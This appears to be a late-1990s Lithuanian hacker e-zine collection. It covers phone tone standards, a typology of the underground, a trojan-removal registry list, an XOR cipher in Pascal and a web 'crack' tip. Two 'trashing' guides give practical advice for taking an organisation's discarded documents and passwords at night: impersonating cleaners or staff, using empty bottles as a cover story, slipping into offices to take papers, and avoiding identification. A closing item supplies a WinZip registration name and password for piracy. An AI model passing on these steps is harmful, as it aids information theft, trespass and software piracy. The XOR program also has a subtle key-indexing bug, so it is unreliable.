48. TONINIAI SIGNALAI TELEFONIJOJE

Parenge: ww0lf
1999/09

Telefonijoje naudojami du pagrindiniai toniniu signalu tipai: DTMF ir MKTT
Abu shie standartai naudoja dvieju tonu signala, t. y. signalas susideda
ish dvieju zhymiai besiskiriancziu garso dazhniu. Didesnio dazhnio signalo
amplitude yra proporcinga mazhesnio dazhnio signalo einamajai reikshmei.

DTMF standartas

DTMF (Dual Tone Multiple Frequency) yra dazhniu rinkinys “2 ish 8”. Jis
naudojamas renkant numeri vadinamu toniniu rinkimu. Kiekvienas signalas
susideda ish dazhniu, kurie yra dvieju grupiu:

Zhemesniosios grupes dazhniai: 697 Hz, 770 Hz, 852 Hz, 941 Hz;

Aukshtesniosios grupes dazhniai: 1209 Hz, 1336 Hz, 1477 Hz, 1633 Hz;

Toks kodas uzhtikrina 16 signaliniu dazhniu kombinaciju, 10 ish kuriu
naudojamos renkant numeri. Mygtukai # ir * naudojami renkant papildomu
paslaugu kodus, o mygtukai A, B, C, D naudojami ishplestineje klaviaturoje.
Dvieju dazhniu signalo siuntimas turi trukti ne trumpiau 40 ms, pauzes – ne
trumpiau 26 ms. Dazhniu stabilumas – ne prascziau kaip 1.6 %

DTMF standarto signalai:

Dazhnis 1209 Hz 1336 Hz 1477 Hz 1633 Hz

697 Hz 1 2 3 A

770 Hz 4 5 6 B

852 Hz 7 8 9 C

941 Hz * 0 # D

MKTT standartas

Shio standarto signalai – dazhniu rinkinys “2 ish 6” ir yra labiausiai
zhinomi ish automatinio numerio nustatymo aparaturos. Ish ju formuojamas
toninis ATS atsakymas, tacziau “beintervaliniai paketai” – ne vienintele
shiu signalu panaudojimo sritis. Jie taip pat naudojami ir po viena
signalizacijai tarp telefono stocziu.

Skirtingai nei DTMF, visi MKTT dazhniai 700, 900, 1100, 1300, 1500, 1700 Hz
yra lygiateisiai ir gali buti bet kokioje kombinacijoje (aishku ishskirus
vienodas), tokiu budu yra 15 imanomu toniniu signalu.

MKTT standarto signalai:

Dazhnis, Hz 700 900 1100 1300 1500 1700

700 N

900 “1” N

1100 “2” “3” N

1300 “4” “5” “6” N

1500 “7” “8” “9” “0” N

1700 – – Begin Repeat – N

P.S.

Komentaru ir pasiulymu laukiu adresu ww0lf@pogrindis.net
Gal kas gali parashyti koki ishsamu failiuka apie tonine signalizacija
tarp ATS Lietuvos Telekomo tinkluose? 🙂 Taip pat bucziau dekingas uzh bet
kokia info apie Lietuvos Telekomo tinklus ir ATS

Knowledge is power! ww0lf

49. Technologinio andegraundo atstovu tipologija

MG, 1999, Kaunas

I. Ivadas

Gyvename technikos amzhiuje. Visos gyvenimo sritys tampa vis labiau
kompiuterizuotos, automatizuotos bei technologizuotos. Tai, be abejo, daro
musu gyvenima patogesni, didina darbo nashuma ir skatina progresa. Tacziau
ne paslaptis, kad technologijos pasiekimais sekmingai naudojasi ir
kriminalinis pasaulis. Nusikaltimams ivykdyti yra panaudojama moderniausia
technika, samdomi specialistai, netgi atliekami tirinejimai.

Tacziau ne tik nusikalstamojo pasaulio atstovai gadina gyvenima doriems
musu kompiuterizuotos visuomenes nariams. Yra zhmoniu, kurie tai daro ish
idejos: kovodami uzh savo isitikinimus, “griaudami Sistema”, arba tiesiog
todel, kad jiems tai patinka. Kiberpankai, kompiuteriniai anarchistai ir
technologiniai chuliganai. Juos ir turesime omeny kalbedami apie marga
technologini pogrindi.

II.Tipologija

1. Hackeriai

Hackeriai – tai bene zhinomiausia technologinio pogrindzhio atstovu
grupe. Del paties zhodzhio “hacker” pradines reikshmes net dabar yra
diskutuojama. Vienas ish variantu – kad jis reishke meistra, kirviu
gaminanti baldus. Taciau shio zhodzhio naudojimo jo dabartine prasme
pradzhios reiktu ieshkoti JAV Masacziusetso Technologiniame Universitete.
7-ame deshimtmetyje, pacioje kompiuteriu eros pradzhioje hackeriais eme
vadinti kietus “programerius”, kuriems nepakako tiesiog vartotoju igudzhiu,
kurie gilinosi i paczius kompiuterio veikimo principus ir jaute malonuma
programuodami. Veliau, kai atsirado kompiuteriu tinklai, galimybe pasiekti
kita kompiuteri per atstuma, atsirado ir pirmi kompiuteriniai nusikaltimai.
Kadangi tokio pobudzhio veiklai reikejo atitinkamu zhiniu, hackerius
susiejo (ir ne be pagrindo) su shiais “isilauzhimais”. O veliau jau spauda
prisidejo prie hackerio, kaip piktojo kompiuterijos genijaus ivaizdzhio
formavimo.

Tai kas gi vis delto yra hackeris? Apibendrindami galime pasakyti, kad
tai aukshto lygio kompiuterines technikos (kaip hardo taip ir softo) ir
kompiuteriniu tinklu specialistas, zhinantis keleta programavimo kalbu,
turintis nestandartini mastyma ir gera humoro jausma. Hackeriui
kompiuteris – tai ne tik darbas ar hobis. Jam tai – gyvenimo budas. .
Specializacijos prasme hackeris – tai kompiuteriniu tinklu bei
nesankcionuoto patekimo i ishskirstytas informacines sistemas specialistas.
Tacziau pilnavercziu hackeriu galima vadinti tik ta, kuris savarankishkai
igyvendina 3 isilauzhimo i sistema pakopas: sistemos analize ir jos
pazheidzhiamumu pajieshka, programine atakos realizacija, ir pagaliau pats
patekimas i apsaugota sistema.

2. Phreakeriai

Phreakeriai (ish anglishko “Phone freak”-telefoninis manijakas)
specializuojasi telikomunikacijoje. Ju aistra – telefonu tinklai. .
Galima sakyti, kad pirmi phreakeriai buvo linksmi vaikinai, dirbantys
pirmuosiuose telefonu komutatoriuose, kada Bell’o ishradimas ka tik pradejo
uzhkariauti pasauli. Dabartinius phreakerius pagal sritis galima skirstyti
i mobilaus ryshio phreakerius (cellular phreakers), anologiniu telefono
stocziu specialistus, bei tuos, kurie uzhsiima skaitmeninu telefono ryshiu.
Yra dar viena sritis, kur phreakerius galima sieti su carderiais – tai
taksofonai, naudojantys plastikines korteles, taczhiau apie korteles –
shiek tiek veliau. Kaip phreakeriu veiklos pavyzdzhius galime pamineti
nemokama naudojimasi telefono ryshio paslaugomis, telefono stochiu
kontrole (vadinami “boksai” – prietaisai, leidzhiantys emuliuoti telefono
stoties signalus ish eilinio abonento telefono linijos), mobilaus ryshio
monitoringa.

3. Carderiai

Carderiai (“card” – kortele): juos domina viskas, kas susije su
plastikinemis kortelemis. Siauriau – nusikaltimai kreditiniu korteliu
pagalba. Shiais laikais plastikines korteles uzhima vis daugiau vietos
ivairiu paslaugu sferoje. Su jomis siejama vadinama “saugiu pinigu” ideja.
Kiek ji saugi rodo vis didejantis nusikaltimu, ivykdytu plastikiniu
korteliu pagalba, skaiczius. Taciau reiktu skirti atvejus, kai tokio
nusikaltimo realizavimui naudojamos aukshtosios technologijos (telefono
korteles “czipo” signalo emuliavimas, t. y. amzhina kortele; kreditiniu
korteliu numeriu algoritmo “lauzhymas”; operacijos su bankomatais) nuo
elementaraus sukcziavimo, pasitelkiant galiojancziu kreditiniu korteliu
numerius, vogtas korteles, etc.

4. Crackeriai

Crackeriai (“crack” – lauzhti): komercines programines irangos
“lauzhymas” – apsaugos nuo nelegalaus kopijavimo ir diegimo
neutralizavimas. Galima sakyti, kad tai jau shiek tiek pasenusi savoka, nes
panashia veikla dabar uzhsiima warezmanai. Crackeriais vadinami
programuotojai, atliekantys pati apsaugos nuo programu nuemima, programos
kodo analize bei “crack’u” (specialiu programu, neutralizuojancziu
apsauginio mechanizmo veikima) rashyma. Crackeriai dazhnai bendradarbiauja
su warezmanais, arba yra ivairiu piratiniu grupiu nariai.

5. Warezmanai

Warezmanai (“warez” – nelegalios programines irangos kopijos):
programines irangos piratai. Warezmanai dirba grupemis kuriu viduje
egzistuoja funkciju pasidalijimas. Paprastai tokioje grupeje buna:
naujausios programines irangos tiekejai (dazhnai piratinis produktas
pasirodo rinkoje ankscziau nei legali programa); kurjeriai, randantys vieta
programines irangos saugojimui (czia warezmanai dazhnai pasitelkia i
pagalba hackerius, kurie nulauzhia koki nors nuobodu serveri, ir paverchia
ji piratiniu programu saugykla, naudodamiesi shio serverio resursais, o
serverio savininkas nieko net neitaria iki tol, kol milzhinishkai
padidejes trafikas ne atkreipia demesio, kad czia kazhkas netvarkoj);
crackeriai, atliekantys apsauginiu programos mechanizmu neutralizavima;
dileriai – ish esmes neturintys nieko bendro su kompiuteriais, bet
atliekantys piratines programines irangos platinima bei tvarkantys visus
organizacinius reikalus.

6. Virus-makeriai

Kaip jau aishku ish pavadinimo, virus-makeriai, tai virusu autoriai.
Ju arkliukas – asembleris ir matematine logika. Kas yra kompiuteriu virusas
czia neaishkinsim, nezhinantys tegul pasidomi specialioje literaturoje.
Technologinio pogrindzhio atstovai vertina virusu autorius dvejopai:
vieni mano shi uzhsiemima esa beprasmiu, brutaliu vandalizmu, kiti jais
zhavisi ir juos idealizuoja, ir czia, ko gero, viskas priklauso nuo pozhiurio.
Galima zhavetis dirbtinos gyvybes formos kureju, bet veikejo, jauczianczio
malonuma skleidzhiant totaline destrukcija kitaip negu socialiniu psichopatu
nepavadinsi.

50. Trashing

Negalvokit, kad hakeris viska padaro tik sededamas prie kompiuterio. Vienas is budu gauti informacija apie auka yra TRASHINGAS (nuo anglisko zodzio trash- siuksles). Pasiknisus aukos siukslineja galima gauti daug info apie auka. Pvz.: ivairius manualus, instrukcijas apie ivaire aukos technine iranga. Galima gauti net ir acountu slaptazodziu, nes kai kurie zmones, kad neuzmirstu juos uzsiraso kur nors ir pota gali si uzrasa ismesti.
Patarimai busimiems trasherems:

-=Pasiimkit su savim keleta daiktu:=-

1. Maisa siukslem. Jug nepulsi viska skaityt vietoj. Viska reikia parsinesti. O kaip tu kitaip parinesi? Beje geriau isideti keleta maisu, nes gali vienas suplysti arba netilpti siuksles i viena.

2. Zibintuveli (prozektoriu). Geriausiai eiti nakti (kuo maziau zmoniu matys tuo geriau), todel reikia su kazkuo pasisviesti ir prozektorius tam puikiai tinka. Patarimas: isitikink ar tikrai veikia jis korektiskai, ar baterijos nenuses etc, prisitvirtink ji kad butu patogu naudotis.

3. Gumines pirstines. Nors jus knisites po visokius popiergalius, bet vistiek reikia apsidrausti, nes galite uztaikyti ant sekretores maisto likuciu, “Allways” :), etc.

4. Tinkama apranga. Ka daryti jei kas nors prades saukti: ko cia knisies? Tada padeda tinkama apranga: kaip kokio slavejo, siusklininko, alchaso. Jei busite apsirenges kaip alchasas, tai galesite pasiteisinti: renku butelius; pravers keletas bonkiu, kad skambetu itikinamiau.

-=Patarimai:=-

Geriausia pries viska darant gerai viska apgalvoti, suzinoti siuksliu vezimo grafikus (kad netektu knistis po tuscia konteineri). Gal net tektu ieit i ofiso (ar pan) patalpas ir siuksles pasiimti is ten (galima ir ne tik siuksles).
Pries eidamas i si zygi patikrink visas kisenes etc: ar nera jokiu nereikalingu daiktu, dokumentu etc (jie gali maisyti zygio metu, gai juos pamesti, arba per juos gali indentifikuoti tave).
Grize ir viska apziureje pasalinkite viska. Issimaudykite po dusu, vonioje etc.

51. Trashingas 2

Trashing’as (nuo anglishko “trash” – “shiukshles”), tai vienas ish
alternatyviniu budu, kuriais hackeris gauna jam reikiamos informacijos.
Kartais tiesiog neitiketina, kiek daug galima suzhinoti apie istaigos ar
organizacijos funkcionavima pazhvelgus i jos shiukshliu dezhiu turini.
Ten galima rasti telefonu sarashus, skirtus vidaus naudojimui, ivairius
manualus ir instrukcijas, organizaciju pavadinimus ir asmenu pavardes, info
apie projektu vystyma, failus magnetiniuose diskeliuose ir daug kitokios
labai idomios informacijos. Pvz., neseniai teko pastebeti remonto atlieku
kruva prie naujo “Snoro” banko ofiso. Tarp ju voliojosi karonines dezhes
nuo baldu ir orgtechnikos. Paanalizavus 🙂 shias atliekas, pavyko aptikti
banke naudojamu modemu su Remote Management tech. aprashymus ir insrukcijas,
bei keleta manualu nuo aparaturos, skirtos kreditiniu korteliu aptarnavimui.
Butu tiesiog neracionalu shia informacija nepasinaudoti.
Aishku, galima dabar tiesiog ishkart varyti tushtinti visus pasitaikusius
shiukshliu konteinerius. Taciau ash patarciau shiam zhygiui gerai pasiruoshti.
Pradekim nuo materialines bazes.
Taigi – “Universalus Trasherio Rinkinys:”

Gumines pirshtines: Nors dauguma shiukshliu, kuriose jums teks knistis yra
“shvarios” – pagrinde popieriai – vis tiek pravartu jas tureti. Taip pat
devekite pirshtines namuose, kai jus rushiuosite savo grobi.

Zhibintuvelis: Pritvirtinkite prie jo virves gabala arba brezentini dirzheli
su kilpa, kuria butu patogu uzhmauti ant rankos. Galingas zhibintuvas labai
pravers jums naktinese zhygiuose, ypac konteinerio viduje. Isitikinkite, kad
jis veikia, ir kad elementai jusu nepaves.

Maishai shiukshlem: Labiausiai tinka tamsus ir nepermatomi – jus juk nenorite,
kad kiti matytu kas juose yra. Patyre zhmones ima ishkart du maishus –
vienas kitame, tam atvejui, jei vienas ish ju suplishtu.

Tinkama apranga: Nevertetu tirineti konteinerius su shiukshlem apsivilkus
shliubini kostiuma. Tas pats ir del batu. Apsirenkite patogiai, geriausiai
senais drabuzhiais, kuriuos nebutu gaila sugadinti. Jeigu turite kazhka
panashaus i specialiuosius drabuzhius – uzhsidekite juos (labai praverstu
oranzhine shlavejo ar shiukshlininko lemene). Jeigu jums yra zhinoma, kad
kompanijos aptarnaujantis personalas paprastai devi tam tikros spalvos
marshkinius, kepuraites ar shvarkus, pasistenkite apsirengti kuo panashiau.
Kitais atvejais rinkites tamses drabuzhiu spalvas.

Tushti buteliai: Taip, taip, nesijuokit 🙂 Kai kurie hackeriai pasako sargams
ar kitiems apsauginiams, kad ieshko tushciu buteliu. Reiktu isideti keleta
ju i savo maisha, kad atrodytumet itikinamiau.

Bendros rekomendacijos: Geriausia uzhsiimt trashingu kai yra nusistoveje
sausi sauleti orai, kad jusu paieshku objektas butu deramam stovyje.
Priesh isheidami ish namu, galite atlikti mazhyti sociologini tyrima,
paskambinti i specialiosios paskirties bendroves, uzhsiimancias shiukshliu
ishvezhimu, suzhinoti ju darbo grafikus. Galbut jums netgi pavyktu
lokalizuoti vietas savartyne, kur vezhamos shiukshles ish tam tikru ofisu.
Galite taip pat pameginti patekti i ofisu patalpas ir pagrobti 🙂 ishmestus
popierius tiesiai ish ten.
Ruoshdamiesi trashingo akcijai, priesh isheinant ish namu, pasitikrinkite
kishenes: ar jose nera pashaliniu daiktu ar dokumentu, leidzhianciu jus
identifikuoti, o taip pat daiktu, kuriuos galite pamesti.
Ir dar vienas neblogas patarimas: grizhe ish medzhiokles, nusiprauskite po
dushu 🙂
Sekmes.

MG , 1998

52. trOJAN REMOVAL

Jei pasigavai koki trojana, kuris tave labai nervina, nieko baisaus! Trojanai – nera labai baisus, kaip atrodo ish pirmo zhvilgsnio. Jiuos visada galima panaikinti, bet visu pirma ishsiaishkinkime kaip jis pas tave pateko. Shtai keletas patarimu, kad jo daugiau nebutu tavo sistemoje:

1. Niekada mIRC’e, ICQ ar kur nors kitur nepriimk keistu failu su keistais pavadinimais pvz: sexypic.bmp.exe!

2. Priesh paleisdamas kiekviena gauta faila ish nepazhistamo/nepatikimo zhmogaus perskanuok ji su antivirusine!

3. Naudok ugnies sienas (firewall), kurios tave apsaugos nuo piktadariu 🙂

Tai butu keletas tokiu smulkiu patarimu. Kad panaikinti jau i sistema isivelusi trojana, tau teriekia surasti jo prirashyta informacija, bei ja ishtrinti. Shtai ka irasho shie trojanai:

Sub 7 2.1

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Winloader”=”MSREXE.exe”
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “WinLoader”=”MSREXE.exe”

Win.ini
[windows] load=MSREXE.exe

System.ini
shell=Explorer.exe MSREXE.exe

Deep Throat 3.1

Nusikopijuoja i: c:windowssystray.exe (Nesumaishyk su: c:windowssystemsystray .exe 🙂

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Systemtray”=”c:\windows\systray.exe”

Shadow Phyre

Nusikopijuoja i:
c:windowssysteminet.exe
c:windowssystemWinZipp.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“WinZipp”=”C:\WINDOWS\SYSTEM\WinZipp.exe /nomsg”
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]
“INET Wizard”=”C:\WINDOWS\SYSTEM\inet.exe /nomsg”

Tiny Telnet Server

Nusikopijuoja i: c:windowswindll.exe 127488 Baitu

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“Windll.exe”=”C:\WINDOWS\Windll.exe”

Kuang

Nusikopijuoja i:
c:windows_webcache_.exe
C:WINDOWSSYSTEMTemp$1.exe

Regedit:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
“WebAccelerator”=”_webcache_.exe”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“Temp$1.task”=”C:\WINDOWS\SYSTEM\Temp$1.exe”

Netsphere

Nusikopijuoja i:
C:WINDOWSsystemnssx.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “NSSX”=”C:\WINDOWS\system\nssx.exe”

FakeVirii

Nusikopijuoja i:
C:WINDOWSsystemnssx.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “Kernel32.dll”=”c:\windows\ccc.exe”
Satans Back Door

Nusikopijuoja i:
C:windowssysprot.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “sysprot “protection”=”C:\windows\sysprot.exe”

Indoctrination

Nusikopijuoja i:
C:windowssysprot.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce]
“Msgsrv16″=”Msgsrv16”
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce]
“Msgsrv16″=”Msgsrv16”
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“Msgsrv16″=”Msgsrv16”
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
“Msgsrv16″=”Msgsrv16”
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]
“Msgsrv16″=”Msgsrv16”

JammerKillah12

Nusikopijuoja i:
C:windowsMsWin32.drv

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]
“MsWindrv”=”MsWin32.drv”

AolTrojan

Nusikopijuoja i :
C:windowsDAT92003.exe arba
C:windowsDAT92003.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“dat92003″=”C:\WINDOWS\SYSTEM\DAT92003.exe”

Hack’a’tack

Nusikopijuoja i:
C:windowsExpl32.exe

Regedit:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“Explorer32″=”C:\WINDOWS\Expl32.exe”

The Unexplained

Nusikopijuoja i:
C:windowsINETB00ST.EXE

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“InetB00st”=”C:\WINDOWS\TEMP\INETB00ST.EXE”

Progenic Trojan Beta Series

Nusikopijuoja i:
c:windowsscandiskvr.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“Scandisk”=”c:\windows\scandiskvr.exe”

Hack’a’ttack1.12

Nusikopijuoja i:
C:WINDOWSExpl32.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“Explorer32″=”C:\WINDOWS\Expl32.exe”

BackConstruction 1.2

Nusikopijuoja i:
C:WINDOWSCmctl32.exe

Regedit:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
“Shell”=”C:\WINDOWS\Cmctl32.exe”

Netsphere Final

Nusikopijuoja i: c:windowssystemepp32.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“ExecPowerProfile”=”C:\WINDOWS\system\epp32.exe”

Vampire

Nusikopijuoja i: c:windowssystemSockets.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Sockets”=”c:windowssystemSockets.exe”

Maverick’s Matrix

Nusikopijuoja i: C:WINDOWSWincfg.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Wincfg.exe”=”C:WINDOWSWincfg.exe”

Total Eclypse

Nusikopijuoja i: C:WindowsSystemRmaapp.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Rnaapp”=”C:\Windows\System\Rmaapp.exe”

Vampire 1.2

Nusikopijuoja i: c:windowssystemWinboot.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “WindowsBootFile”=”c:\windows\system\Winboot.exe”

Incommand

Nusikopijuoja i: Path_Where_RunFilename.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “AdvancedSettings”=”Path_Where_RunFilename.exe”

Transscout 1.1 +1.2

Nusikopijuoja i: c:windowskernel16.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “kernel16″=”C:\WINDOWS\kernel16.exe”

Ambush

Nusikopijuoja i: c:windowsZcn32.exe

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
“ZKA”=”Zcn32.exe”

DerSpaeher3

Nusikopijuoja i: C:WINDOWSSystemdkbdll.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Explore”=”C:WINDOWSSystem\dkbdll.exe Hi”

Subseven 2.x

Nusikopijuoja i: C:WINDOWSMSREXE.exe

Regedit:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] “Winloader”=”MSREXE.exe”
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] “WinLoader”=”MSREXE.exe”Win.ini:

Win.ini:
[windows] load=MSREXE.exe

System.ini:
shell=Explorer.exe MSREXE.exe

Y3k

Nusikopijuoja i: C:WINDOWSSYSTEMRundII.EXE

Regedit:
[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]
“Explorer32″=”C:\WINDOWS\RundII.exe”

Remote hack 1.1 & 1.2

Nusikopijuoja i: C:WINDOWSSYSTEMRundII.EXE

Regedit:
[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]
“Norton Anti Virus”=”C:\WINDOWS\norton.exe”

BioNet (Ver: 0-8-4; 0.8.71; 2.2.1; 2.6.1)

Nusikopijuoja i: C:WINDOWSSYSTEMlibupdate.exe

Regedit:
[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]
“WinLibUpdate”=”C:\WINDOWS\libupdate.exe -hide”

SheepGoat

Nusikopijuoja i: C:WINDOWSSYSTEMSG.scr

Win.ini:
run=C:WINDOWSSYSTEMSG.scr

CrazyNet

Nusikopijuoja i: C:WINDOWSRegistry32.exe

Regedit:
[HKCUUSoftwareMicrosoftWindowsCurrentVersionRun]
“Reg32″=”Registry32.exe”

Win.ini:
run=Registry32.exe

System.ini:
shell=Explorer.exe Registry32.exe

Taigi, jums tereikia vis tai pratrinti ir problemos kaip nebuta! Sekmes! NUKE

53. Web crack

Kaip nuhakinti saita Puslapio nuhakinimo yra daug budu.Viena ash ish ju chia paminesiu.Tai vienuzhodzhiu yra hackinimas per guestbook,a. Jums tereikia surasti saita kuriame bootu guestbook’as,ir toje vietoje kur turetumete parashyti kaip patiko saitas,parashykite scripta, tai yra: Ir viskas. Happy Hacking. Skeletaz

54. XOR- sifravimo metodas

Vienas is paprasciausiu sifravimu yra XOR metodas. Jis pagrystas logine funkcija XOR.
XOR reiksmiu lentele:

argumentai reiksme 1 1 0

1 0 1

0 1 1

0 0 0

Sifravimas algoritmas toks:
1. Imamas tokio ilgio tekstas/duomenys [kuriuos norme uzsifruoti], koks yra slaptazodzio ilgis.
2. Kiekvienas, atitinkamas teksto/duomenu baitas ir slaptazodzio baitas pateikami kaip XOR argumentai.
3. Gautas baitas ir yra tas uzsifruotas baitas.
4. Imama sekantys slaptazodzio ilgio baitai ir (kol tekstas/duomenys nesibaige) vykdoma punktas nr. 2.

Issifravimas analogiskas sifravimui:
Imamas uzsifruotas tekstas/duomenys ir jie dar karta sifruojami pagal auksciau pateikta algoritma.
Gaunamas nesifruotas tekstas.

Sio metodo trukumai yra tie, jog jei sifrojamas normalus tekstas ir slaptazodis nelabai ilgas, tai gan lengvai galima pralausti si algoritma brute force`u.

Jei kas susizavejo siuo algoritmu, tai parasiau trumpa programele, kuri demonstruoja sifravima/desifravima duomenis.

uses crt;
var unsifred, {nesifruota fraze}

sifred, {sifruota fraze}

desifred, {issifruota fraze}

key: string; {sifravimoraktas}

i, {pagalbinis kintamasis}

ki : byte; {rakto ilgi nusakantis dydis}
begin

ClrScr; {valom ekrana}

WriteLn ( ‘Ivesk fraze kuria sifruosi:’ );

ReadLn ( unsifred ); {Ivedam sifruojama fraze}

WriteLn ( ‘Ivesk rakta pagal kuri sifruosi:’ );

ReadLn ( key ); {Ivedam sifravimo rakta}

ki := Length ( key ); {Randam rakto ilgi}

sifred := unsifred; {Padarom eilutes, kuriu ilgiai}

desifred := unsifred; {butu lygus frazes ilgiui}

for i := 1 to Length ( unsifred ) do {Sifruojame}

sifred [ i ] := Chr ( ord ( unsifred [ i ] ) xor

Ord ( key [ i mod ki ] ) );

WriteLn (sifred); {Sausdiname uzsifruota fraze}

for i := 1 to Length ( unsifred ) do {Desifruojame/atsifruojame}

desifred [ i ] := Chr ( ord ( sifred [ i ] ) xor

Ord ( key [ i mod ki ] ) );

WriteLn (desifred); {Sausdiname atsifruota fraze}

ReadLn; {Laukiame [ENTER] paspaudimo}

55. Kaip nucrackin’ti WinZip 7.0

Nukrakinti WinZip very zaprasta.Paleisk WinZip.PairinkOrder ir, jai nebijai necenzuriniu zhodzhiu i User namelaukeli ivesk:
eik nx
O i password:
111111bf

Shtai ir viskas

Happy cracking.
Skeletaz

Leave a Comment